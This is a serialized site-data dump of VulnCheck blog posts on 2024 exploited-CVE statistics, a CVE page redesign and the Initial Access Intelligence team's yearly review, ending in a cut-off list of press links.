var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":57663},[57664],{"id":201,"depth":220,"text":202},"2025-02-04","VulnCheck and partner GreyNoise discovered Zyxel-related vulnerabilities being targeted in the wild. In this blog, VulnCheck describes the vulnerabilities CVE-2024-40891 and CVE-2025-0890.",{"slug":57668},"zyxel-telnet-vulns","\u002Fblog\u002Fzyxel-telnet-vulns",{"title":55260,"description":57666},"blog\u002Fzyxel-telnet-vulns",[242,1281,1279],"yD9frnM0KtVKw6OLTyKOEgFvjL6mDmSjxT3RbZI3w4g",{"id":57675,"title":57676,"articles":57677,"authors":57740,"body":57742,"date":57682,"description":57889,"extension":234,"image":7,"link":7,"meta":57890,"navigation":237,"path":57892,"seo":57893,"series":7,"stem":57894,"subtype":7,"tags":57895,"__hash__":57896},"blog\u002Fblog\u002F2024-exploitation-trends.md","2024 Trends in Vulnerability Exploitation",[57678,57683,57686,57690,57693,57696,57699,57702,57705,57709,57713,57717,57721,57726,57729,57732,57736],{"title":57679,"source":57680,"link":57681,"date":57682},"768 CVEs Exploited in the Wild in 2024","InfoSecurity Magazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fcves-exploited-wild-2024\u002F","2025-02-03",{"title":57684,"source":14382,"link":57685,"date":57682},"768 CVEs Exploited in 2024, Reflecting a 20% Increase from 639 in 
2023","https:\u002F\u002Fthehackernews.com\u002F2025\u002F02\u002F768-cves-exploited-in-2024-reflecting.html",{"title":57687,"source":57688,"link":57689,"date":57682},"768 Vulnerabilities Exploited in the Wild in 2024: A 20% Year-Over-Year Surge","CyberSecurity News","https:\u002F\u002Fcybersecuritynews.com\u002F768-vulnerabilities-exploited\u002F",{"title":57691,"source":33995,"link":57692,"date":57682},"Record number of exploited security vulnerabilities reached in 2024","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Frecord-number-of-exploited-security-vulnerabilities-reached-in-2024",{"title":57694,"source":14378,"link":57695,"date":57665},"Exploitation of Over 700 Vulnerabilities Came to Light in 2024","https:\u002F\u002Fwww.securityweek.com\u002Fexploitation-of-over-700-vulnerabilities-came-to-light-in-2024\u002F",{"title":57697,"source":43752,"link":57698,"date":57665},"Channel Brief: Qualys Launches TotalAppSec Solution","https:\u002F\u002Fwww.channele2e.com\u002Fnews\u002Fchannel-brief-qualys-launches-totalappsec-solution",{"title":57700,"source":30021,"link":57701,"date":57665},"Report: CVE Disclosures Reach New Highs Last Year","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Freport-cve-disclosures-reach-new-highs-last-year",{"title":57703,"source":251,"link":57704,"date":57665},"MSSP Market Update: Riot Security Raises $30M for Cybersecurity Training","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fmssp-market-update",{"title":57706,"source":57707,"link":57708,"date":57665},"768 CVEs Exploited in the Wild in 2024: A 20% Increase Noted","RedPacket Security","https:\u002F\u002Fwww.redpacketsecurity.com\u002F768-cves-exploited-in-the-wild-in-2024\u002F",{"title":57710,"source":57711,"link":57712,"date":57665},"VulnCheck Report Says Exploited CVEs Up 20% In 2024","The IT 
Nerd","https:\u002F\u002Fitnerd.blog\u002F2025\u002F02\u002F04\u002Fvulncheck-report-says-exploited-cves-up-20-in-2024\u002F",{"title":57714,"source":57715,"link":57716,"date":57665},"768 Vulnerabilities Were Actively Attacked Last Year","SC Mag UK","https:\u002F\u002Finsight.scmagazineuk.com\u002F768-vulnerabilities-were-actively-attacked-last-year",{"title":57718,"source":57719,"link":57720,"date":55249},"768 vulnerabilities were exploited by hackers in 2024","HackMag","https:\u002F\u002Fhackmag.com\u002Fnews\u002Fcve-exploitation\u002F",{"title":57722,"source":57723,"link":57724,"date":57725},"Vulnerability exploits were up in 2024 (and so was information sharing)","ITBrew","https:\u002F\u002Fwww.itbrew.com\u002Fstories\u002F2025\u002F02\u002F12\u002Fvulnerability-exploits-were-up-in-2024-and-so-was-information-sharing","2025-02-12",{"title":57727,"source":12182,"link":57728,"date":54944},"24% of vulnerabilities are abused before a patch is available","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3823429\u002F24-of-vulnerabilities-are-abused-before-a-patch-is-available.html",{"title":57730,"source":11228,"link":57731,"date":45079},"Is Ivanti the problem or a symptom of a systemic issue with network devices?","https:\u002F\u002Fcyberscoop.com\u002Fivanti-exploited-vulnerabilities-network-edge-devices-kev-list\u002F",{"title":57733,"source":11218,"link":57734,"date":57735},"Proof-of-Concept in 15 Minutes? 
AI Turbocharges Exploitation","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fproof-concept-15-minutes-ai-turbocharges-exploitation","2025-08-29",{"title":57737,"source":57738,"link":57739,"date":19502},"Not every security vulnerability means you need to update right now — here's how to know which ones do","MUO","https:\u002F\u002Fwww.makeuseof.com\u002Fnot-every-security-vulnerability-means-you-need-to-update-right-now\u002F",[57741],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":57743,"toc":57881},[57744,57746,57760,57767,57771,57779,57783,57788,57791,57805,57808,57810,57813,57825,57829,57835,57838,57849,57852,57856,57859,57870,57872,57874,57876],[61,57745,20],{"id":3520},[22,57747,57748,57751,57754,57757],{},[25,57749,57750],{},"768 CVEs were publicly reported as exploited in the wild; up 20% YoY",[25,57752,57753],{},"Spikes in volume of CVE reporting link back to key industry events and new sources",[25,57755,57756],{},"In 2024, 23.6% of KEVs were known to be exploited on or before the day their CVEs were publicly disclosed",[25,57758,57759],{},"There were over 100 unique sources that were the first to report a CVE as exploited, with third parties leading the charge (i.e., security companies (e.g., CheckPoint, Aqua Security, Fortinet, F5), government agencies (e.g., DOD, CISA, NHS), and non-profits (e.g., Shadow Server))",[18,57761,57762,57763,57766],{},"2024 marked another banner year for threat actors targeting the exploitation of vulnerabilities. Exploitation disclosures came from various sources, including product companies, security vendors, government agencies, non-profits, and media outlets worldwide. 
This blog post examines broader trends across exploited vulnerabilities where exploitation was first publicly disclosed in 2024, leveraging insights from ",[47,57764,1233],{"href":2871,"rel":57765},[51],", a free community resource launched at the beginning of 2024.",[1920,57768,57770],{"id":57769},"growth-in-publicly-reported-exploitation","Growth in Publicly Reported Exploitation",[18,57772,57773,57774,57778],{},"In 2024, VulnCheck identified 768 CVEs that were publicly reported as exploited in the wild for the first time. This is an increase of 20% from 2023 when there were 639 CVEs that were publicly reported as exploited in the wild for the first time. During 2024, 1% of the CVEs published were reported publicly as exploited in the wild, aligning closely with historical trends outlined in our ",[47,57775,57777],{"href":44893,"rel":57776},[51],"State of Exploitation Report",". This number is expected to grow as exploitation is often discovered long after a CVE is published.",[61,57780,57782],{"id":57781},"how-many-vulnerabilities-are-reported-to-be-exploited-each-month-for-the-first-time","How many vulnerabilities are reported to be exploited each month for the first time?",[18,57784,57785],{},[68,57786],{"alt":43858,"src":57787,"width":28205},"\u002Fblog\u002F2024-exploitation-trends\u002F2024-kev-source.png",[18,57789,57790],{},"By analyzing reported exploitation by month, we gain a better understanding of the volume of CVEs that are likely to require immediate attention as they are discovered to be exploited in the wild. 
While the baseline of exploited CVEs ranged from 30-50 per month, notable spikes were observed during certain periods:",[22,57792,57793,57796,57799,57802],{},[25,57794,57795],{},"April\u002FMay: Increased reports during RSA and end-of-quarter reports.",[25,57797,57798],{},"Onboarding of New Sources: The onboarding of ShadowServer into January.",[25,57800,57801],{},"F5\u002FCISA & DOD Reports: Industry reports, including the Flax Typhoon botnet disclosure.",[25,57803,57804],{},"Wordfence Disclosures: We coordinated with Wordfence, which issued CVEs for vulnerabilities they had evidence for but no CVE ID.",[18,57806,57807],{},"These spikes underscore how industry events and new resources impact reporting volumes on exploitation. We encourage organizations to publicly disclose any instances where there is exploitation activity.",[61,57809,37327],{"id":37326},[18,57811,57812],{},"A common concern is how quickly vulnerabilities are exploited after disclosure. In 2024, 23.6% of KEVs were known to be exploited on or before the day their CVEs were publicly disclosed, a slight decrease from 2023's 27%. 
Despite the buzz around \"zero-day\" exploitation, these findings indicate that exploitation can happen at any time in a vulnerability's lifecycle.",[18,57814,57815,57819,57820],{},[68,57816],{"alt":57817,"src":57818,"width":28205},"Speed to KEV","\u002Fblog\u002F2024-exploitation-trends\u002Fexploitation-timeline.png","\nSource: ",[47,57821,57824],{"href":57822,"rel":57823},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fjupyter-notebooks\u002Ftree\u002Fmain\u002Fexploitation-timeline",[51],"VulnCheck Exploitation Timeline Jupyter Notebook",[61,57826,57828],{"id":57827},"who-is-the-first-to-publicly-report-exploitation","Who is the First to Publicly Report Exploitation?",[18,57830,57831],{},[68,57832],{"alt":57833,"src":57834,"width":28205},"Earliest Reporter","\u002Fblog\u002F2024-exploitation-trends\u002F2024-earliest-reporter.png",[18,57836,57837],{},"Of the 768 CVEs first reported as exploited in 2024, 112 unique sources provided initial evidence. These sources include:",[22,57839,57840,57843,57846],{},[25,57841,57842],{},"Third Parties: Security companies (e.g., CheckPoint, Aqua Security, Fortinet, F5), government agencies (e.g., DOD, CISA, NHS), and non-profits (e.g., Shadow Server).",[25,57844,57845],{},"Product Companies: Microsoft, Google, Apple, Cisco, Ivanti, and others frequently disclosed exploitation of their own products, as well as third-party vulnerabilities.",[25,57847,57848],{},"Social Media \u002F Blogs: Infosec Exchange, X, LinkedIn, Medium",[18,57850,57851],{},"VulnCheck KEV was created to provide security teams with early and broad visibility into exploited vulnerabilities regardless of where the disclosure happens. 
Our mission remains to empower defenders by offering this resource free of charge.",[61,57853,57855],{"id":57854},"considerations-bias","Considerations \u002F Bias",[18,57857,57858],{},"We make a strong effort to be as transparent as possible with our research, and you can also validate it yourself with free access to VulnCheck KEV. Here are some considerations that might introduce bias in our research:",[1789,57860,57861,57864,57867],{},[25,57862,57863],{},"We onboarded ShadowServer over a three-month period starting in November 2023. Several of these CVEs are likely to have been identified prior to our adding this as a source, so there is likely an increase in the number of CVEs associated with Shadow Server that could be attributed to an earlier date.",[25,57865,57866],{},"We worked with Wordfence to coordinate the disclosure of CVEs that were being exploited, as outlined above.",[25,57868,57869],{},"It’s possible there are other resources for public exploitation that we haven’t captured. Therefore, if you are aware of any CVEs we missed exploitation evidence on, please let us know. 
Generally, we find that things that are widely exploited tend to surface publicly pretty quickly.",[61,57871,202],{"id":201},[18,57873,45062],{},[18,57875,208],{},[18,57877,211,57878,45071],{},[47,57879,216],{"href":214,"rel":57880},[51],{"title":219,"searchDepth":220,"depth":220,"links":57882},[57883,57884,57885,57886,57887,57888],{"id":3520,"depth":220,"text":20},{"id":57781,"depth":220,"text":57782},{"id":37326,"depth":220,"text":37327},{"id":57827,"depth":220,"text":57828},{"id":57854,"depth":220,"text":57855},{"id":201,"depth":220,"text":202},"In September, VulnCheck identified evidence of 78 CVEs that were publicly disclosed for the first time as exploited in the wild.",{"slug":57891},"2024-exploitation-trends","\u002Fblog\u002F2024-exploitation-trends",{"title":57676,"description":57889},"blog\u002F2024-exploitation-trends",[1280,242,1279],"TupBAwy7llRpapyrecdlq5AEQOL0CVzEQzMbka60Wuo",{"id":57898,"title":57899,"articles":7,"authors":57900,"body":57903,"date":58055,"description":58056,"extension":234,"image":7,"link":7,"meta":58057,"navigation":237,"path":58059,"seo":58060,"series":7,"stem":58061,"subtype":7,"tags":58062,"__hash__":58063},"blog\u002Fblog\u002Fnew-year-new-ui.md","New Year, New UI",[57901],{"name":3256,"avatar":3257,"link":3258,"linkName":57902},"kimberduke",{"type":15,"value":57904,"toc":58049},[57905,57911,57914,57917,57920,57923,57927,57930,57938,57944,57967,57971,57974,57977,57982,58008,58012,58042,58046],[18,57906,57907],{},[68,57908],{"alt":57909,"src":57910,"width":28205},"Customer CVE Page","\u002Fblog\u002Fnew-year-new-ui\u002Fcve-customer.png",[18,57912,57913],{},"Ever tried to look up a CVE? Quickly, accurately, without wading through a mess of outdated or incomplete data? If you've been in the trenches of vulnerability management, you know the struggle. 
When I joined VulnCheck, one of the first things I noticed was how fragmented and inefficient this process can be across the industry.",[18,57915,57916],{},"A strong cybersecurity program starts with knowing your vulnerabilities. Getting that information shouldn’t be a hassle; it should be clear, actionable, and fast. That’s why we’ve overhauled the VulnCheck CVE page. This update brings threat intelligence front and center, refines the layout, and makes navigation seamless. The result? A more intuitive, threat-centric approach to analyzing vulnerabilities and prioritizing what matters.",[18,57918,57919],{},"And it's not just the CVE, it's having the context around that CVE with visibility into how that specific vulnerability is impacting an organization. Or threat actor linkages. Or MITRE techniques. Or ransomware and botnet attribution. Or botnets. So, depending on what category you’re monitoring, that might be 100 or 1000 CVEs that you need to analyze. The nice thing about what we’ve built is we’ve customized the experience to make it easy, simple and straightforward to get to what matters.",[18,57921,57922],{},"This is a big step forward in making vulnerability intelligence more accessible and effective. Because when it comes to securing your environment, speed and accuracy make all the difference.",[61,57924,57926],{"id":57925},"enhancements-in-vulncheck-community-edition","Enhancements in VulnCheck Community Edition",[18,57928,57929],{},"When a new CVE drops, is it just another entry in the database, or is it already being exploited in the wild? Our goal is to help the community understand this at a glance, and to be the fastest reference to do so. 
The updated VulnCheck CVE Details page gives you a clear view of a vulnerability’s entire lifecycle, whether it’s newly assigned, actively exploited, or somewhere in between.",[18,57931,57932,57933,57937],{},"VulnCheck users with a ",[47,57934,57936],{"href":40745,"rel":57935},[51],"free Community account"," can see the following:",[18,57939,57940],{},[68,57941],{"alt":57942,"src":57943,"width":28205},"Community CVE Page","\u002Fblog\u002Fnew-year-new-ui\u002Fcve-community.png",[22,57945,57946,57949,57952,57955,57958,57961,57964],{},[25,57947,57948],{},"Quickly see if a CVE is known to be exploited or just assigned, with clear indicators on every step in its progression.",[25,57950,57951],{},"See a vulnerability timeline, such as when the CVE was published, when CISA added it to KEV, when NVD published, and if any updates have been made by NVD.",[25,57953,57954],{},"See what products are impacted using either NVD or VulnCheck CPE.",[25,57956,57957],{},"Direct access to exploitation references.",[25,57959,57960],{},"Access to exploits curated in VulnCheck's Exploit Database (XDB). This is a curated index of PoC code from Git repositories, compiled with human validation and automated screening.\nComprehensive references to everything you need in one place, including vendor patches (when available), so you can move from awareness to action fast.",[25,57962,57963],{},"A quick link to the JSON is available as well as a link to APIs that community members have access to.",[25,57965,57966],{},"CVSS-B scoring.",[61,57968,57970],{"id":57969},"benefits-to-vulncheck-customers","Benefits to VulnCheck Customers",[18,57972,57973],{},"Our customers know not all vulnerabilities are equal. Some remain dormant, while others quickly become weapons for botnets, ransomware, and targeted attacks. 
As a security leader, you need to know which CVEs pose a real threat… and how.",[18,57975,57976],{},"Here are a few things that are new in the VulnCheck CVE page for customers:",[18,57978,57979],{},[68,57980],{"alt":57909,"src":57981,"width":28205},"\u002Fblog\u002Fnew-year-new-ui\u002Fcve-threat.png",[22,57983,57984,57987,57990,57993,57996,57999,58002,58005],{},[25,57985,57986],{},"Instantly see where a vulnerability stands with easy-to-read tiles. Are threat actors exploiting it? Is it linked to botnets, ransomware, weaponized exploits, or just a proof-of-concept?\nGo beyond basic CVSS Base Score with EPSS, CVSS-BT, and SSVC for a deeper risk assessment.",[25,57988,57989],{},"Gain a global view of exposure with potentially vulnerable IPs, sorted by country.",[25,57991,57992],{},"Utilize the MITRE ATT&CK mappings to quickly assess how a vulnerability aligns with adversary tactics and techniques to strengthen your defenses.",[25,57994,57995],{},"See exactly who is leveraging the vulnerability, whether it’s cybercriminals, state-sponsored groups, or botnets.",[25,57997,57998],{},"Our enhanced exploitation timeline gives a more detailed breakdown of when exploitation was first observed, giving you the edge in response.",[25,58000,58001],{},"Prioritization systems including Stakeholder Specific Vulnerability Categorization (SSVC), CVSS-BT Enrichment and EPSS.",[25,58003,58004],{},"Detections including VulnCheck, Emerging Threats, SigmaHQ, CheckPoint, etc.",[25,58006,58007],{},"Early visibility into CVEs not published yet.",[61,58009,58011],{"id":58010},"using-the-new-cve-page","Using the New CVE Page",[1789,58013,58014,58025,58031,58036],{},[25,58015,58016,58019,58020,58024],{},[1131,58017,58018],{},"Log in to VulnCheck:"," Navigate to ",[47,58021,58022],{"href":58022,"rel":58023},"https:\u002F\u002Fvulncheck.com\u002Fhome",[51]," to create an account or log in.",[25,58026,58027,58030],{},[1131,58028,58029],{},"Search for a CVE:"," Use the search bar in the top left-hand 
corner to enter a CVE ID.",[25,58032,58033],{},[1131,58034,58035],{},"Enjoy the Data!",[25,58037,58038,58041],{},[1131,58039,58040],{},"Integrate with Your Tools"," Export the data using the JSON tab, the link to the API, or contact sales so we can help figure out the best way to integrate into your toolset.",[61,58043,58045],{"id":58044},"the-future-is-here","The Future is Here",[18,58047,58048],{},"This update is just the beginning. We’re constantly pushing to make vulnerability and exploit intelligence faster, sharper, and more actionable. If you’ve got feedback, we’re listening! And most importantly, stay tuned because there’s more on the way.",{"title":219,"searchDepth":220,"depth":220,"links":58050},[58051,58052,58053,58054],{"id":57925,"depth":220,"text":57926},{"id":57969,"depth":220,"text":57970},{"id":58010,"depth":220,"text":58011},{"id":58044,"depth":220,"text":58045},"2025-01-30","VulnCheck's new update enhances our CVE pages bringing actionable threat intelligence to the forefront.",{"slug":58058},"new-year-new-ui","\u002Fblog\u002Fnew-year-new-ui",{"title":57899,"description":58056},"blog\u002Fnew-year-new-ui",[242,1280,28705],"dm5OSYzikJ6364Nh6NyYaJw_PS_G8seg4N-RiYYdxig",{"id":58065,"title":58066,"articles":58067,"authors":58071,"body":58073,"date":58350,"description":58351,"extension":234,"image":7,"link":7,"meta":58352,"navigation":237,"path":58354,"seo":58355,"series":7,"stem":58356,"subtype":7,"tags":58357,"__hash__":58358},"blog\u002Fblog\u002Fvulncheck-iai-2024.md","VulnCheck Initial Access Intelligence - 2024 Year in Review",[58068],{"title":58069,"source":12157,"link":58070,"date":57682},"Risky Bulletin: CISA & FDA warn of backdoor in patient 
monitor","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-fda-warns-of-backdoor-in-patient-monitor\u002F",[58072],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":58074,"toc":58343},[58075,58081,58083,58103,58107,58114,58121,58124,58151,58154,58158,58161,58165,58172,58175,58188,58195,58203,58207,58210,58215,58218,58222,58225,58252,58256,58259,58316,58318,58332],[18,58076,58077],{},[68,58078],{"alt":58079,"src":58080,"width":28205},"IAI 2024","\u002Fblog\u002Fvulncheck-iai-2024\u002Fiai-2024.png",[1920,58082,20],{"id":3520},[22,58084,58085,58088,58091,58094,58097,58100],{},[25,58086,58087],{},"In 2024, VulnCheck's Initial Access Intelligence (IAI) team delivered custom exploits and detection artifacts for 169 CVEs.",[25,58089,58090],{},"Among these, 99 CVEs (58.6%) were actively exploited in the wild.",[25,58092,58093],{},"For 27 CVEs, IAI coverage was provided before exploitation in the wild was reported, helping customers stay ahead of attackers by an average of two CVEs per month.",[25,58095,58096],{},"Additionally, 17 CVEs not yet known to be exploited in the wild have malicious activity on GreyNoise tags or queries generated by the IAI team.",[25,58098,58099],{},"Nine of the CVEs were zero-day vulnerabilities, with VulnCheck offering advanced warnings to its customers.",[25,58101,58102],{},"The go-exploit framework saw significant improvements to the C2 system and a novel scanless feature.",[1920,58104,58106],{"id":58105},"introduction-to-initial-access-intelligence-iai","Introduction to Initial Access Intelligence (IAI)",[18,58108,58109,58110,58113],{},"VulnCheck delivers ",[47,58111,216],{"href":214,"rel":58112},[51]," through a robust, automated system that gathers extensive metadata for every vulnerability documented across the internet.",[18,58115,58116,58117,58120],{},"Complementing this offering is VulnCheck's ",[47,58118,1245],{"href":45535,"rel":58119},[51],". 
This offering focuses on carefully curated exploits, detections, scanners, and queries targeting the most critical vulnerabilities. Together, these services provide a balanced approach: broad, high-level insights for all vulnerabilities and in-depth analysis of the most significant threats.",[18,58122,58123],{},"Our Initial Access Intelligence aims to give users a complete understanding of the vulnerability and how to find it. The data isn’t targeted at any one demographic. Red teams, detection engineers, vulnerability management groups, attack surface management, and incident response pros would all find this information useful. When possible, the IAI team develops:",[22,58125,58126,58133,58136,58139,58142,58145,58148],{},[25,58127,58128,58129,58132],{},"In-house exploits using our ",[47,58130,20558],{"href":14297,"rel":58131},[51]," framework, which incorporate asset discovery and version scanning capabilities.",[25,58134,58135],{},"Search engine queries for finding exploitable systems. Currently supporting: Censys, Shodan, FOFA, ZoomEye, Google, and Baidu.",[25,58137,58138],{},"GreyNoise queries for identifying ongoing attacks in the wild.",[25,58140,58141],{},"Snort and Suricata network signatures for detecting active exploitation.",[25,58143,58144],{},"PCAPs that capture exploitation attempts or malicious behavior.",[25,58146,58147],{},"YARA rules tailored for identifying indicators of compromise.",[25,58149,58150],{},"Vulnerable Docker images to support testing and analysis efforts.",[18,58152,58153],{},"This extensive package equips users with the tools needed to not only detect vulnerabilities but also analyze and simulate exploitation scenarios.",[61,58155,58157],{"id":58156},"new-iai-coverage-in-2024","New IAI Coverage in 2024",[18,58159,58160],{},"In 2024, the IAI team delivered coverage for 169 CVEs, covering 101 different vendors.",[18,58162,58163],{},[68,58164],{"alt":58079,"src":58080,"width":28205},[18,58166,58167,58168,58171],{},"Leading the way in 
coverage, perhaps surprisingly to some, was the Apache Project. The Apache Project is the steward of many important software projects. So many, in fact, that 17 Apache Project CVEs were added to ",[47,58169,1233],{"href":2871,"rel":58170},[51]," in 2024 (only five of which are listed in CISA KEV).",[18,58173,58174],{},"Unsurprisingly, router and VPN manufacturers like Zyxel, Palo Alto Networks, Ivanti, and Fortinet followed Apache. These products are staples for any effective initial access team: they are challenging to monitor, not always easy to patch, and frequently exposed directly to the internet by design. Each of these vendors faced significant vulnerabilities in 2024 that warranted in-depth analysis by VulnCheck’s team.",[18,58176,58177,58178,58182,58183,59],{},"Also notable on the graph are enterprise vendors like Fortra, Progress, and SolarWinds. These companies’ products are fixtures in enterprise environments but continue to feature prominently on known exploitable target lists year after year. This persistent pattern underscores the importance of monitoring these solutions for vulnerabilities that attackers are quick to exploit.\nIn total, the team would cover 99 vulnerabilities that had been exploited in the wild. Some of our coverage was in the “rapid response” style, like for ",[47,58179,1510],{"href":58180,"rel":58181},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-4577",[51]," (affecting PHP) in which the team delivered content one day before the CVE was even published. But the team also worked on important historical vulnerabilities like Sophos CVE-2020-25223 with the knowledge that attackers ",[47,58184,58187],{"href":58185,"rel":58186},"http:\u002F\u002FCVE-2020-25223",[51],"still pursue the vulnerability today",[18,58189,58190,58191,58194],{},"The team has also generated coverage for 61 CVEs that have not been exploited in the wild ",[1131,58192,58193],{},"yet",", but have a high probability of being targeted in the future. 
That includes targets that have been in VulnCheck KEV before, like TeamCity (CVE-2024-23917), Spring Cloud (CVE-2024-37084), and Sonatype Nexus (CVE-2024-4956). That also includes some things off the beaten path, like Anyscale Ray (CVE-2023-6019), Traccar (CVE-2024-31214), and Laravel (CVE-2024-29291). The team focuses not just on what is well known to US enterprises, but also on global attackers.",[18,58196,58197,58198,59],{},"Finally, as part of this work, the team inevitably finds zero-day vulnerabilities, of which we found nine in the last year. We handle these by providing detection to our customers and then working on disclosure with the vendor according to our ",[47,58199,58202],{"href":58200,"rel":58201},"https:\u002F\u002Fvulncheck.com\u002Fvulnerability-disclosure-policy",[51],"disclosure policy",[61,58204,58206],{"id":58205},"delivery-of-vulncheck-initial-access-artifacts","Delivery of VulnCheck Initial Access Artifacts",[18,58208,58209],{},"Around May 2024, the Initial Access team doubled in size, resulting in a significant increase in monthly deliverables.",[18,58211,58212],{},[68,58213],{"alt":58079,"src":58214,"width":28205},"\u002Fblog\u002Fvulncheck-iai-2024\u002Fiai-2024-monthly.png",[18,58216,58217],{},"The team strives to consistently provide actionable intelligence on a minimum of four vulnerabilities per week (on average). By definition, all the vulnerabilities we work on are essential, so such detailed coverage is a boon to any organization.",[61,58219,58221],{"id":58220},"expanded-capabilities","Expanded Capabilities",[18,58223,58224],{},"The team doesn’t just focus on providing coverage for vulnerabilities. We are also intensely interested in how they can be exploited in real-world scenarios. That requires maintenance of our exploit framework go-exploit. 
This year, we saw three major updates:",[22,58226,58227,58236,58244],{},[25,58228,58229,58230,58235],{},"In ",[47,58231,58234],{"href":58232,"rel":58233},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-goes-scanless",[51],"July",", we updated go-exploit to allow for the exploits to share information across runs. This makes go-exploit the only exploit framework to scan HTTP targets without ever connecting to them!",[25,58237,58229,58238,58243],{},[47,58239,58242],{"href":58240,"rel":58241},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fgo-exploit-shelltunnel",[51],"October",", we expanded the capabilities of go-exploit to include a new command and control feature called ShellTunnel, which captures reverse shell traffic and routes it through an intermediary server before sending it on to the primary C2 server.",[25,58245,58229,58246,58251],{},[47,58247,58250],{"href":58248,"rel":58249},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fgo-exploit-external-c2s",[51],"September",", we added external C2s to go-exploit. This feature enables community members to create C2 channels and payloads with direct integration into the go-exploit framework. The changes initially pushed in 1.25.0 give go-exploit the flexibility to import external C2 modules and define multiple types of external C2s.",[61,58253,58255],{"id":58254},"the-blogging-highlights","The Blogging Highlights",[18,58257,58258],{},"Finally, the team loves to blog and share details of our work when possible. 
The following is a listing of the interesting blogs the IAI team helped develop in 2024:",[22,58260,58261,58266,58273,58280,58285,58292,58297,58302,58309],{},[25,58262,58263],{},[47,58264,22211],{"href":53842,"rel":58265},[51],[25,58267,58268],{},[47,58269,58272],{"href":58270,"rel":58271},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fofbiz-cve-2023-51467",[51],"Weaponizing Apache OFBiz CVE-2023-51467",[25,58274,58275],{},[47,58276,58279],{"href":58277,"rel":58278},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fip-intel-7777-botnet",[51],"7777-Botnet Infection Vectors",[25,58281,58282],{},[47,58283,53826],{"href":53824,"rel":58284},[51],[25,58286,58287],{},[47,58288,58291],{"href":58289,"rel":58290},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ftoo-many-honeypots",[51],"There Are Too Many Damn Honeypots",[25,58293,58294],{},[47,58295,58272],{"href":58270,"rel":58296},[51],[25,58298,58299],{},[47,58300,36637],{"href":53833,"rel":58301},[51],[25,58303,58304],{},[47,58305,58308],{"href":58306,"rel":58307},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fexploring-abb-ics-vulns",[51],"Exploring ABB Vulnerabilities and Their Impact on Industrial Control Systems",[25,58310,58311],{},[47,58312,58315],{"href":58313,"rel":58314},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fzyxel-cve-2023-33012",[51],"re: Zyxel VPN Series Pre-auth Remote Command 
Execution",[61,58317,202],{"id":201},[18,58319,53821,58320,1246,58323,1246,58326,1255,58329],{},[47,58321,40447],{"href":53829,"rel":58322},[51],[47,58324,36637],{"href":53833,"rel":58325},[51],[47,58327,55229],{"href":53837,"rel":58328},[51],[47,58330,22211],{"href":53842,"rel":58331},[51],[18,58333,53846,58334,53850,58337,982,58340,1260],{},[47,58335,1233],{"href":2871,"rel":58336},[51],[47,58338,1245],{"href":45535,"rel":58339},[51],[47,58341,216],{"href":214,"rel":58342},[51],{"title":219,"searchDepth":220,"depth":220,"links":58344},[58345,58346,58347,58348,58349],{"id":58156,"depth":220,"text":58157},{"id":58205,"depth":220,"text":58206},{"id":58220,"depth":220,"text":58221},{"id":58254,"depth":220,"text":58255},{"id":201,"depth":220,"text":202},"2025-01-29","In 2024, VulnCheck's Initial Access Intelligence (IAI) team delivered custom exploits and detection artifacts for 169 CVEs. Among these, 99 CVEs (58.6%) were actively exploited in the wild.",{"slug":58353},"vulncheck-iai-2024","\u002Fblog\u002Fvulncheck-iai-2024",{"title":58066,"description":58351},"blog\u002Fvulncheck-iai-2024",[1281,1279,242,1280],"2cA4Df652_AW8iJJeQMHuGrHI-7KFg6z8PfyKkZLxZE",{"id":58360,"title":53826,"articles":58361,"authors":58440,"body":58442,"date":58573,"description":58574,"extension":234,"image":7,"link":7,"meta":58575,"navigation":237,"path":58577,"seo":58578,"series":7,"stem":58579,"subtype":7,"tags":58580,"__hash__":58581},"blog\u002Fblog\u002Ffour-faith-cve-2024-12856.md",[58362,58366,58370,58373,58375,58377,58380,58382,58384,58386,58389,58391,58394,58396,58398,58400,58403,58406,58409,58413,58417,58421,58425,58428,58431,58436],{"title":58363,"source":14382,"link":58364,"date":58365},"15,000+ Four-Faith Routers Exposed to New Exploit Due to Default Credentials","https:\u002F\u002Fthehackernews.com\u002F2024\u002F12\u002F15000-four-faith-routers-exposed-to-new.html","2024-12-28",{"title":58367,"source":19479,"link":58368,"date":58369},"Four-Faith Routers Exploited Using New 
